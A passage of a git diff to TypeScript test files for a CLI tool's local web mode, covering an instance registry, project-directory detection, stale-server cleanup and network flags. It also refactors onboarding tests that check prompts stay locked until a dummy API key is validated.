+      },
+    },
+  )
+
+  assert.equal(status.ok, false)
+  if (status.ok) throw new Error('expected failed web launch status')
+  assert.equal(status.hostPath, null)
+  assert.equal(status.url, null)
+  assert.equal(openedUrl, '')
+  assert.match(status.failureReason, /host bootstrap not found/)
+  assert.match(stderrOutput, /status=failed/)
+  assert.match(stderrOutput, /reason=host bootstrap not found/)
+})
+
+// ─── Instance registry tests ─────────────────────────────────────────
+
+test('registerInstance and readInstanceRegistry round-trip', (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-registry-'))
+  const registryPath = join(tmp, 'web-instances.json')
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  webMode.registerInstance('/tmp/project-a', { pid: 1001, port: 3000, url: 'http://127.0.0.1:3000' }, registryPath)
+  webMode.registerInstance('/tmp/project-b', { pid: 1002, port: 3001, url: 'http://127.0.0.1:3001' }, registryPath)
+
+  const registry = webMode.readInstanceRegistry(registryPath)
+  assert.equal(Object.keys(registry).length, 2)
+  assert.equal(registry[resolve('/tmp/project-a')]?.pid, 1001)
+  assert.equal(registry[resolve('/tmp/project-b')]?.port, 3001)
+  assert.ok(registry[resolve('/tmp/project-a')]?.startedAt)
+})
+
+test('unregisterInstance removes a single entry', (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-unreg-'))
+  const registryPath = join(tmp, 'web-instances.json')
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  webMode.registerInstance('/tmp/project-a', { pid: 1001, port: 3000, url: 'http://127.0.0.1:3000' }, registryPath)
+  webMode.registerInstance('/tmp/project-b', { pid: 1002, port: 3001, url: 'http://127.0.0.1:3001' }, registryPath)
+  webMode.unregisterInstance('/tmp/project-a', registryPath)
+
+  const registry = webMode.readInstanceRegistry(registryPath)
+  assert.equal(Object.keys(registry).length, 1)
+  assert.equal(registry[resolve('/tmp/project-a')], undefined)
+  assert.equal(registry[resolve('/tmp/project-b')]?.pid, 1002)
+})
+
+test('stopWebMode with projectCwd reports not-found when not in registry', () => {
+  let stderrOutput = ''
+
+  const result = webMode.stopWebMode(
+    { stderr: { write: (chunk: string) => { stderrOutput += chunk; return true } } },
+    { projectCwd: '/tmp/nonexistent-project-for-stop-test' },
+  )
+
+  assert.equal(result.ok, false)
+  assert.equal(result.reason, 'not-found')
+  assert.match(stderrOutput, /No web server running/)
+})
+
+test('gsd web stop all is parsed and dispatched', async () => {
+  let stopOptions: { projectCwd?: string; all?: boolean } | undefined
+
+  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', 'web', 'stop', 'all'])
+  assert.deepEqual(flags.messages, ['web', 'stop', 'all'])
+
+  const result = await cliWeb.runWebCliBranch(flags, {
+    stopWebMode: (_deps, opts) => {
+      stopOptions = opts
+      return { ok: true, stoppedCount: 2 }
+    },
+    stderr: { write: () => true },
+  })
+
+  assert.equal(result.handled, true)
+  if (!result.handled) throw new Error('expected handled')
+  assert.equal(result.exitCode, 0)
+  assert.equal(stopOptions?.all, true)
+  assert.equal(stopOptions?.projectCwd, undefined)
+})
+
+test('gsd web stop <path> is parsed and dispatched with resolved path', async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-stop-path-'))
+  let stopOptions: { projectCwd?: string; all?: boolean } | undefined
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const flags = cliWeb.parseCliArgs(['node', 'dist/loader.js', 'web', 'stop', tmp])
+  const result = await cliWeb.runWebCliBranch(flags, {
+    cwd: () => '/',
+    stopWebMode: (_deps, opts) => {
+      stopOptions = opts
+      return { ok: true, stoppedCount: 1 }
+    },
+    stderr: { write: () => true },
+  })
+
+  assert.equal(result.handled, true)
+  if (!result.handled) throw new Error('expected handled')
+  assert.equal(result.exitCode, 0)
+  assert.equal(stopOptions?.projectCwd, tmp)
+  assert.equal(stopOptions?.all, false)
+})
+
+// ─── Context-aware launch detection tests ──────────────────────────────
+
+test('resolveContextAwareCwd returns project cwd when inside a project under dev root', (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
+  const devRoot = join(tmp, 'devroot')
+  const projectA = join(devRoot, 'projectA')
+  const prefsPath = join(tmp, 'web-preferences.json')
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  mkdirSync(projectA, { recursive: true })
+  writeFileSync(prefsPath, JSON.stringify({ devRoot }))
+
+  const result = cliWeb.resolveContextAwareCwd(projectA, prefsPath)
+  assert.equal(result, projectA)
+})
+
+test('resolveContextAwareCwd returns cwd unchanged when AT dev root', (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
+  const devRoot = join(tmp, 'devroot')
+  const prefsPath = join(tmp, 'web-preferences.json')
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  mkdirSync(devRoot, { recursive: true })
+  writeFileSync(prefsPath, JSON.stringify({ devRoot }))
+
+  const result = cliWeb.resolveContextAwareCwd(devRoot, prefsPath)
+  assert.equal(result, devRoot)
+})
+
+test('resolveContextAwareCwd returns cwd unchanged when no dev root configured', (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
+  const prefsPath = join(tmp, 'web-preferences.json')
+  const cwd = join(tmp, 'somedir')
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  mkdirSync(cwd, { recursive: true })
+  writeFileSync(prefsPath, JSON.stringify({ theme: 'dark' }))
+
+  const result = cliWeb.resolveContextAwareCwd(cwd, prefsPath)
+  assert.equal(result, cwd)
+})
+
+test('resolveContextAwareCwd returns cwd unchanged when prefs file missing', (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
+  const prefsPath = join(tmp, 'nonexistent-prefs.json')
+  const cwd = join(tmp, 'somedir')
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  mkdirSync(cwd, { recursive: true })
+
+  const result = cliWeb.resolveContextAwareCwd(cwd, prefsPath)
+  assert.equal(result, cwd)
+})
+
+test('resolveContextAwareCwd returns cwd unchanged when dev root path is stale', (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
+  const prefsPath = join(tmp, 'web-preferences.json')
+  const cwd = join(tmp, 'somedir')
+  const staleDevRoot = join(tmp, 'nonexistent-devroot')
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  mkdirSync(cwd, { recursive: true })
+  writeFileSync(prefsPath, JSON.stringify({ devRoot: staleDevRoot }))
+
+  const result = cliWeb.resolveContextAwareCwd(cwd, prefsPath)
+  assert.equal(result, cwd)
+})
+
+test('resolveContextAwareCwd resolves nested cwd to one-level-deep project', (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
+  const devRoot = join(tmp, 'devroot')
+  const projectA = join(devRoot, 'projectA')
+  const nested = join(projectA, 'src', 'components', 'deep')
+  const prefsPath = join(tmp, 'web-preferences.json')
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  mkdirSync(nested, { recursive: true })
+  writeFileSync(prefsPath, JSON.stringify({ devRoot }))
+
+  const result = cliWeb.resolveContextAwareCwd(nested, prefsPath)
+  assert.equal(result, projectA)
+})
+
+test('resolveContextAwareCwd returns cwd unchanged when outside dev root', (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-ctx-aware-'))
+  const devRoot = join(tmp, 'devroot')
+  const outsideDir = join(tmp, 'elsewhere')
+  const prefsPath = join(tmp, 'web-preferences.json')
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  mkdirSync(devRoot, { recursive: true })
+  mkdirSync(outsideDir, { recursive: true })
+  writeFileSync(prefsPath, JSON.stringify({ devRoot }))
+
+  const result = cliWeb.resolveContextAwareCwd(outsideDir, prefsPath)
+  assert.equal(result, outsideDir)
+})
+
+// ─── Stale instance cleanup tests ─────────────────────────────────────
+
+test('launchWebMode kills stale instance for same cwd before spawning', async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-stale-'))
+  const standaloneRoot = join(tmp, 'dist', 'web', 'standalone')
+  const serverPath = join(standaloneRoot, 'server.js')
+  mkdirSync(standaloneRoot, { recursive: true })
+  writeFileSync(serverPath, 'console.log("stub")\n')
+
+  const registryPath = join(tmp, 'web-instances.json')
+  const pidFilePath = join(tmp, 'web-server.pid')
+  const cwd = '/tmp/stale-project'
+
+  // Pre-register a stale instance for the same cwd
+  webMode.registerInstance(cwd, { pid: 77777, port: 3000, url: 'http://127.0.0.1:3000' }, registryPath)
+
+  let stderrOutput = ''
+  let spawnCalled = false
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const status = await webMode.launchWebMode(
+    {
+      cwd,
+      projectSessionsDir: '/tmp/.gsd/sessions/stale',
+      agentDir: '/tmp/.gsd/agent',
+      packageRoot: tmp,
+    },
+    {
+      initResources: () => {},
+      resolvePort: async () => 45200,
+      execPath: '/custom/node',
+      env: { TEST_ENV: '1' },
+      spawn: (command, args, options) => {
+        spawnCalled = true
+        return {
+          pid: 88888,
+          once: () => undefined,
+          unref: () => {},
+        } as any
+      },
+      waitForBootReady: async () => undefined,
+      openBrowser: () => {},
+      pidFilePath,
+      writePidFile: webMode.writePidFile,
+      registryPath,
+      stderr: {
+        write(chunk: string) {
+          stderrOutput += chunk
+          return true
+        },
+      },
+    },
+  )
+
+  assert.equal(status.ok, true)
+  assert.equal(spawnCalled, true)
+  // Stale instance for same cwd should have been cleaned up
+  assert.match(stderrOutput, /Cleaning up stale/)
+  // New instance should be registered
+  const registry = webMode.readInstanceRegistry(registryPath)
+  assert.equal(registry[resolve(cwd)]?.pid, 88888)
+})
+
+test('launchWebMode does not log cleanup when no stale instance exists', async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-no-stale-'))
+  const standaloneRoot = join(tmp, 'dist', 'web', 'standalone')
+  const serverPath = join(standaloneRoot, 'server.js')
+  mkdirSync(standaloneRoot, { recursive: true })
+  writeFileSync(serverPath, 'console.log("stub")\n')
+
+  const registryPath = join(tmp, 'web-instances.json')
+  const pidFilePath = join(tmp, 'web-server.pid')
+
+  let stderrOutput = ''
+
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const status = await webMode.launchWebMode(
+    {
+      cwd: '/tmp/clean-project',
+      projectSessionsDir: '/tmp/.gsd/sessions/clean',
+      agentDir: '/tmp/.gsd/agent',
+      packageRoot: tmp,
+    },
+    {
+      initResources: () => {},
+      resolvePort: async () => 45201,
+      execPath: '/custom/node',
+      env: { TEST_ENV: '1' },
+      spawn: () => ({
+        pid: 88889,
+        once: () => undefined,
+        unref: () => {},
+      } as any),
+      waitForBootReady: async () => undefined,
+      openBrowser: () => {},
+      pidFilePath,
+      writePidFile: webMode.writePidFile,
+      registryPath,
+      stderr: {
+        write(chunk: string) {
+          stderrOutput += chunk
+          return true
+        },
+      },
+    },
+  )
+
+  assert.equal(status.ok, true)
+  // No cleanup message when no stale instance exists
+  assert.equal(stderrOutput.includes('Cleaning up stale'), false)
+})
diff --git a/src/tests/web-mode-network-flags.test.ts b/src/tests/integration/web-mode-network-flags.test.ts
similarity index 53%
rename from src/tests/web-mode-network-flags.test.ts
rename to src/tests/integration/web-mode-network-flags.test.ts
index 216f269ce..7fb82fd56 100644
--- a/src/tests/web-mode-network-flags.test.ts
+++ b/src/tests/integration/web-mode-network-flags.test.ts
@@ -4,8 +4,8 @@ import { mkdirSync, mkdtempSync, rmSync, writeFileSync } from 'node:fs'
 import { join } from 'node:path'
 import { tmpdir } from 'node:os'
 
-const cliWeb = await import('../cli-web-branch.ts')
-const webMode = await import('../web-mode.ts')
+const cliWeb = await import('../../cli-web-branch.ts')
+const webMode = await import('../../web-mode.ts')
 
 // ─── CLI flag parsing ────────────────────────────────────────────────
 
@@ -65,7 +65,7 @@ test('parseCliArgs does not set network flags when not provided', () => {
 
 // ─── launchWebMode env forwarding ────────────────────────────────────
 
-test('launchWebMode forwards custom host, port, and allowed origins to subprocess env', async () => {
+test('launchWebMode forwards custom host, port, and allowed origins to subprocess env', async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-net-'))
   const standaloneRoot = join(tmp, 'dist', 'web', 'standalone')
   const serverPath = join(standaloneRoot, 'server.js')
@@ -74,47 +74,45 @@ test('launchWebMode forwards custom host, port, and allowed origins to subproces
 
   let spawnEnv: Record<string, string> | undefined
 
-  try {
-    const status = await webMode.launchWebMode(
-      {
-        cwd: '/tmp/project',
-        projectSessionsDir: '/tmp/.gsd/sessions',
-        agentDir: '/tmp/.gsd/agent',
-        packageRoot: tmp,
-        host: '0.0.0.0',
-        port: 8080,
-        allowedOrigins: ['http://192.168.1.10:8080', 'http://tailscale-host:8080'],
-      },
-      {
-        initResources: () => {},
-        spawn: (_command, _args, options) => {
-          spawnEnv = (options as { env: Record<string, string> }).env
-          return { pid: 99999, once: () => undefined, unref: () => {} } as any
-        },
-        waitForBootReady: async () => undefined,
-        openBrowser: () => {},
-        stderr: { write: () => true },
-      },
-    )
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
 
-    assert.equal(status.ok, true)
-    if (!status.ok) throw new Error('expected success')
-    assert.equal(status.host, '0.0.0.0')
-    assert.equal(status.port, 8080)
-    assert.equal(status.url, 'http://0.0.0.0:8080')
+  const status = await webMode.launchWebMode(
+    {
+      cwd: '/tmp/project',
+      projectSessionsDir: '/tmp/.gsd/sessions',
+      agentDir: '/tmp/.gsd/agent',
+      packageRoot: tmp,
+      host: '0.0.0.0',
+      port: 8080,
+      allowedOrigins: ['http://192.168.1.10:8080', 'http://tailscale-host:8080'],
+    },
+    {
+      initResources: () => {},
+      spawn: (_command, _args, options) => {
+        spawnEnv = (options as { env: Record<string, string> }).env
+        return { pid: 99999, once: () => undefined, unref: () => {} } as any
+      },
+      waitForBootReady: async () => undefined,
+      openBrowser: () => {},
+      stderr: { write: () => true },
+    },
+  )
 
-    assert.ok(spawnEnv)
-    assert.equal(spawnEnv!.HOSTNAME, '0.0.0.0')
-    assert.equal(spawnEnv!.PORT, '8080')
-    assert.equal(spawnEnv!.GSD_WEB_HOST, '0.0.0.0')
-    assert.equal(spawnEnv!.GSD_WEB_PORT, '8080')
-    assert.equal(spawnEnv!.GSD_WEB_ALLOWED_ORIGINS, 'http://192.168.1.10:8080,http://tailscale-host:8080')
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
+  assert.equal(status.ok, true)
+  if (!status.ok) throw new Error('expected success')
+  assert.equal(status.host, '0.0.0.0')
+  assert.equal(status.port, 8080)
+  assert.equal(status.url, 'http://0.0.0.0:8080')
+
+  assert.ok(spawnEnv)
+  assert.equal(spawnEnv!.HOSTNAME, '0.0.0.0')
+  assert.equal(spawnEnv!.PORT, '8080')
+  assert.equal(spawnEnv!.GSD_WEB_HOST, '0.0.0.0')
+  assert.equal(spawnEnv!.GSD_WEB_PORT, '8080')
+  assert.equal(spawnEnv!.GSD_WEB_ALLOWED_ORIGINS, 'http://192.168.1.10:8080,http://tailscale-host:8080')
 })
 
-test('launchWebMode omits GSD_WEB_ALLOWED_ORIGINS when none provided', async () => {
+test('launchWebMode omits GSD_WEB_ALLOWED_ORIGINS when none provided', async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-no-origins-'))
   const standaloneRoot = join(tmp, 'dist', 'web', 'standalone')
   const serverPath = join(standaloneRoot, 'server.js')
@@ -123,79 +121,75 @@ test('launchWebMode omits GSD_WEB_ALLOWED_ORIGINS when none provided', async ()
 
   let spawnEnv: Record<string, string> | undefined
 
-  try {
-    await webMode.launchWebMode(
-      {
-        cwd: '/tmp/project',
-        projectSessionsDir: '/tmp/.gsd/sessions',
-        agentDir: '/tmp/.gsd/agent',
-        packageRoot: tmp,
-      },
-      {
-        initResources: () => {},
-        resolvePort: async () => 45000,
-        env: { CLEAN_ENV: '1' },
-        spawn: (_command, _args, options) => {
-          spawnEnv = (options as { env: Record<string, string> }).env
-          return { pid: 99999, once: () => undefined, unref: () => {} } as any
-        },
-        waitForBootReady: async () => undefined,
-        openBrowser: () => {},
-        stderr: { write: () => true },
-      },
-    )
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
 
-    assert.ok(spawnEnv)
-    assert.equal(spawnEnv!.GSD_WEB_ALLOWED_ORIGINS, undefined)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
+  await webMode.launchWebMode(
+    {
+      cwd: '/tmp/project',
+      projectSessionsDir: '/tmp/.gsd/sessions',
+      agentDir: '/tmp/.gsd/agent',
+      packageRoot: tmp,
+    },
+    {
+      initResources: () => {},
+      resolvePort: async () => 45000,
+      env: { CLEAN_ENV: '1' },
+      spawn: (_command, _args, options) => {
+        spawnEnv = (options as { env: Record<string, string> }).env
+        return { pid: 99999, once: () => undefined, unref: () => {} } as any
+      },
+      waitForBootReady: async () => undefined,
+      openBrowser: () => {},
+      stderr: { write: () => true },
+    },
+  )
+
+  assert.ok(spawnEnv)
+  assert.equal(spawnEnv!.GSD_WEB_ALLOWED_ORIGINS, undefined)
 })
 
 // ─── runWebCliBranch end-to-end forwarding ───────────────────────────
 
-test('runWebCliBranch forwards --host, --port, --allowed-origins to launchWebMode', async () => {
+test('runWebCliBranch forwards --host, --port, --allowed-origins to launchWebMode', async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-web-branch-flags-'))
   const projectDir = join(tmp, 'project')
   mkdirSync(projectDir, { recursive: true })
 
   let receivedOptions: Record<string, unknown> | undefined
 
-  try {
-    const flags = cliWeb.parseCliArgs([
-      'node', 'dist/loader.js', '--web', projectDir,
-      '--host', '0.0.0.0',
-      '--port', '9000',
-      '--allowed-origins', 'http://my-host:9000',
-    ])
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
 
-    const result = await cliWeb.runWebCliBranch(flags, {
-      runWebMode: async (options) => {
-        receivedOptions = options as unknown as Record<string, unknown>
-        return {
-          mode: 'web' as const,
-          ok: true as const,
-          cwd: options.cwd,
-          projectSessionsDir: options.projectSessionsDir,
-          host: '0.0.0.0',
-          port: 9000,
-          url: 'http://0.0.0.0:9000',
-          hostKind: 'source-dev' as const,
-          hostPath: '/tmp/fake-web/package.json',
-          hostRoot: '/tmp/fake-web',
-        }
-      },
-      stderr: { write: () => true },
-    })
+  const flags = cliWeb.parseCliArgs([
+    'node', 'dist/loader.js', '--web', projectDir,
+    '--host', '0.0.0.0',
+    '--port', '9000',
+    '--allowed-origins', 'http://my-host:9000',
+  ])
 
-    assert.equal(result.handled, true)
-    if (!result.handled) throw new Error('expected handled')
-    assert.equal(result.exitCode, 0)
-    assert.ok(receivedOptions)
-    assert.equal(receivedOptions!.host, '0.0.0.0')
-    assert.equal(receivedOptions!.port, 9000)
-    assert.deepEqual(receivedOptions!.allowedOrigins, ['http://my-host:9000'])
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
+  const result = await cliWeb.runWebCliBranch(flags, {
+    runWebMode: async (options) => {
+      receivedOptions = options as unknown as Record<string, unknown>
+      return {
+        mode: 'web' as const,
+        ok: true as const,
+        cwd: options.cwd,
+        projectSessionsDir: options.projectSessionsDir,
+        host: '0.0.0.0',
+        port: 9000,
+        url: 'http://0.0.0.0:9000',
+        hostKind: 'source-dev' as const,
+        hostPath: '/tmp/fake-web/package.json',
+        hostRoot: '/tmp/fake-web',
+      }
+    },
+    stderr: { write: () => true },
+  })
+
+  assert.equal(result.handled, true)
+  if (!result.handled) throw new Error('expected handled')
+  assert.equal(result.exitCode, 0)
+  assert.ok(receivedOptions)
+  assert.equal(receivedOptions!.host, '0.0.0.0')
+  assert.equal(receivedOptions!.port, 9000)
+  assert.deepEqual(receivedOptions!.allowedOrigins, ['http://my-host:9000'])
 })
diff --git a/src/tests/integration/web-mode-onboarding.test.ts b/src/tests/integration/web-mode-onboarding.test.ts
index 58370a925..8977a42cf 100644
--- a/src/tests/integration/web-mode-onboarding.test.ts
+++ b/src/tests/integration/web-mode-onboarding.test.ts
@@ -295,132 +295,134 @@ function configureBridgeRuntime(
 }
 
 
-test("successful browser onboarding restarts the stale bridge child and unlocks the first prompt", async () => {
+test("successful browser onboarding restarts the stale bridge child and unlocks the first prompt", async (t) => {
   const fixture = makeWorkspaceFixture();
   const authStorage = AuthStorage.inMemory({});
   const harness = configureBridgeRuntime(fixture, authStorage);
   onboarding.configureOnboardingServiceForTests({
     authStorage,
+    getEnvApiKey: () => undefined,
     validateApiKey: async () => ({ ok: true, message: "openai credentials validated" }),
   });
 
-  try {
-    const bootResponse = await bootRoute.GET();
-    assert.equal(bootResponse.status, 200);
-    const bootPayload = (await bootResponse.json()) as any;
-    assert.equal(bootPayload.onboarding.locked, true);
-    assert.equal(bootPayload.onboarding.lockReason, "required_setup");
-    assert.equal(harness.spawnCalls, 1);
-    assert.equal(harness.generations[0]?.authVisibleAtStart, false);
-
-    const blockedPrompt = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "prompt", message: "should stay locked" }),
-      }),
-    );
-    assert.equal(blockedPrompt.status, 423);
-    const blockedPayload = (await blockedPrompt.json()) as any;
-    assert.equal(blockedPayload.code, "onboarding_locked");
-    assert.equal(blockedPayload.details.reason, "required_setup");
-    assert.equal(harness.promptCount, 0);
-
-    const validationResponse = await onboardingRoute.POST(
-      new Request("http://localhost/api/onboarding", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "save_api_key",
-          providerId: "openai",
-          apiKey: "sk-valid-123456",
-        }),
-      }),
-    );
-    assert.equal(validationResponse.status, 200);
-    const validationPayload = (await validationResponse.json()) as any;
-    assert.equal(validationPayload.onboarding.locked, false);
-    assert.equal(validationPayload.onboarding.lockReason, null);
-    assert.equal(validationPayload.onboarding.bridgeAuthRefresh.phase, "succeeded");
-    assert.equal(harness.spawnCalls, 2);
-    assert.equal(harness.generations[1]?.authVisibleAtStart, true);
-
-    const firstPrompt = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "prompt", message: "first unlocked prompt" }),
-      }),
-    );
-    assert.equal(firstPrompt.status, 200);
-    const firstPromptPayload = (await firstPrompt.json()) as any;
-    assert.equal(firstPromptPayload.success, true);
-    assert.equal(firstPromptPayload.command, "prompt");
-    assert.equal(harness.promptCount, 1);
-    assert.deepEqual(harness.generations[1]?.promptMessages, ["first unlocked prompt"]);
-  } finally {
+  t.after(async () => {
     onboarding.resetOnboardingServiceForTests();
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const bootResponse = await bootRoute.GET();
+  assert.equal(bootResponse.status, 200);
+  const bootPayload = (await bootResponse.json()) as any;
+  assert.equal(bootPayload.onboarding.locked, true);
+  assert.equal(bootPayload.onboarding.lockReason, "required_setup");
+  assert.equal(harness.spawnCalls, 1);
+  assert.equal(harness.generations[0]?.authVisibleAtStart, false);
+
+  const blockedPrompt = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "prompt", message: "should stay locked" }),
+    }),
+  );
+  assert.equal(blockedPrompt.status, 423);
+  const blockedPayload = (await blockedPrompt.json()) as any;
+  assert.equal(blockedPayload.code, "onboarding_locked");
+  assert.equal(blockedPayload.details.reason, "required_setup");
+  assert.equal(harness.promptCount, 0);
+
+  const validationResponse = await onboardingRoute.POST(
+    new Request("http://localhost/api/onboarding", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "save_api_key",
+        providerId: "openai",
+        apiKey: "sk-valid-123456",
+      }),
+    }),
+  );
+  assert.equal(validationResponse.status, 200);
+  const validationPayload = (await validationResponse.json()) as any;
+  assert.equal(validationPayload.onboarding.locked, false);
+  assert.equal(validationPayload.onboarding.lockReason, null);
+  assert.equal(validationPayload.onboarding.bridgeAuthRefresh.phase, "succeeded");
+  assert.equal(harness.spawnCalls, 2);
+  assert.equal(harness.generations[1]?.authVisibleAtStart, true);
+
+  const firstPrompt = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "prompt", message: "first unlocked prompt" }),
+    }),
+  );
+  assert.equal(firstPrompt.status, 200);
+  const firstPromptPayload = (await firstPrompt.json()) as any;
+  assert.equal(firstPromptPayload.success, true);
+  assert.equal(firstPromptPayload.command, "prompt");
+  assert.equal(harness.promptCount, 1);
+  assert.deepEqual(harness.generations[1]?.promptMessages, ["first unlocked prompt"]);
 });
 
-test("refresh failures keep the workspace locked and expose the failed bridge-refresh reason", async () => {
+test("refresh failures keep the workspace locked and expose the failed bridge-refresh reason", async (t) => {
   const fixture = makeWorkspaceFixture();
   const authStorage = AuthStorage.inMemory({});
   const harness = configureBridgeRuntime(fixture, authStorage, { failRestart: true });
   onboarding.configureOnboardingServiceForTests({
     authStorage,
+    getEnvApiKey: () => undefined,
     validateApiKey: async () => ({ ok: true, message: "openai credentials validated" }),
   });
 
-  try {
-    const bootResponse = await bootRoute.GET();
-    assert.equal(bootResponse.status, 200);
-    assert.equal(harness.spawnCalls, 1);
-
-    const validationResponse = await onboardingRoute.POST(
-      new Request("http://localhost/api/onboarding", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "save_api_key",
-          providerId: "openai",
-          apiKey: "sk-valid-123456",
-        }),
-      }),
-    );
-    assert.equal(validationResponse.status, 503);
-    const validationPayload = (await validationResponse.json()) as any;
-    assert.equal(validationPayload.onboarding.required.satisfied, true);
-    assert.equal(validationPayload.onboarding.locked, true);
-    assert.equal(validationPayload.onboarding.lockReason, "bridge_refresh_failed");
-    assert.equal(validationPayload.onboarding.lastValidation.status, "succeeded");
-    assert.equal(validationPayload.onboarding.bridgeAuthRefresh.phase, "failed");
-    assert.match(validationPayload.onboarding.bridgeAuthRefresh.error, /could not attach/i);
-    assert.equal(harness.spawnCalls, 2);
-    assert.equal(harness.generations[1]?.authVisibleAtStart, true);
-
-    const blockedPrompt = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "prompt", message: "still locked after failed refresh" }),
-      }),
-    );
-    assert.equal(blockedPrompt.status, 423);
-    const blockedPayload = (await blockedPrompt.json()) as any;
-    assert.equal(blockedPayload.code, "onboarding_locked");
-    assert.equal(blockedPayload.details.reason, "bridge_refresh_failed");
-    assert.equal(harness.promptCount, 0);
-
-    const failedBootResponse = await bootRoute.GET();
-    assert.equal(failedBootResponse.status, 200);
-    const failedBootPayload = (await failedBootResponse.json()) as any;
-    assert.equal(failedBootPayload.onboarding.locked, true);
-    assert.equal(failedBootPayload.onboarding.lockReason, "bridge_refresh_failed");
-    assert.equal(failedBootPayload.onboarding.bridgeAuthRefresh.phase, "failed");
-    assert.match(failedBootPayload.onboarding.bridgeAuthRefresh.error, /could not attach/i);
-  } finally {
+  t.after(async () => {
     onboarding.resetOnboardingServiceForTests();
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const bootResponse = await bootRoute.GET();
+  assert.equal(bootResponse.status, 200);
+  assert.equal(harness.spawnCalls, 1);
+
+  const validationResponse = await onboardingRoute.POST(
+    new Request("http://localhost/api/onboarding", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "save_api_key",
+        providerId: "openai",
+        apiKey: "sk-valid-123456",
+      }),
+    }),
+  );
+  assert.equal(validationResponse.status, 503);
+  const validationPayload = (await validationResponse.json()) as any;
+  assert.equal(validationPayload.onboarding.required.satisfied, true);
+  assert.equal(validationPayload.onboarding.locked, true);
+  assert.equal(validationPayload.onboarding.lockReason, "bridge_refresh_failed");
+  assert.equal(validationPayload.onboarding.lastValidation.status, "succeeded");
+  assert.equal(validationPayload.onboarding.bridgeAuthRefresh.phase, "failed");
+  assert.match(validationPayload.onboarding.bridgeAuthRefresh.error, /could not attach/i);
+  assert.equal(harness.spawnCalls, 2);
+  assert.equal(harness.generations[1]?.authVisibleAtStart, true);
+
+  const blockedPrompt = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "prompt", message: "still locked after failed refresh" }),
+    }),
+  );
+  assert.equal(blockedPrompt.status, 423);
+  const blockedPayload = (await blockedPrompt.json()) as any;
+  assert.equal(blockedPayload.code, "onboarding_locked");
+  assert.equal(blockedPayload.details.reason, "bridge_refresh_failed");
+  assert.equal(harness.promptCount, 0);
+
+  const failedBootResponse = await bootRoute.GET();
+  assert.equal(failedBootResponse.status, 200);
+  const failedBootPayload = (await failedBootResponse.json()) as any;
+  assert.equal(failedBootPayload.onboarding.locked, true);
+  assert.equal(failedBootPayload.onboarding.lockReason, "bridge_refresh_failed");
+  assert.equal(failedBootPayload.onboarding.bridgeAuthRefresh.phase, "failed");
+  assert.match(failedBootPayload.onboarding.bridgeAuthRefresh.error, /could not attach/i);
 });
 
 test("fresh gsd --web browser onboarding stays locked on failed validation and unlocks after a successful retry", async (t) => {
@@ -434,76 +436,76 @@ test("fresh gsd --web browser onboarding stays locked on failed validation and u
   const browserLogPath = join(tempRoot, "browser-open.log")
   let port: number | null = null
 
-  try {
-    const launch = await launchPackagedWebHost({
-      launchCwd: repoRoot,
-      tempHome,
-      browserLogPath,
-      env: {
-        GSD_WEB_TEST_FAKE_API_KEY_VALIDATION: "1",
-        ANTHROPIC_API_KEY: "",
-        OPENAI_API_KEY: "",
-        GOOGLE_API_KEY: "",
-      },
-    })
-    port = launch.port
-
-    assert.equal(launch.exitCode, 0, `expected the web launcher to exit cleanly:\n${launch.stderr}`)
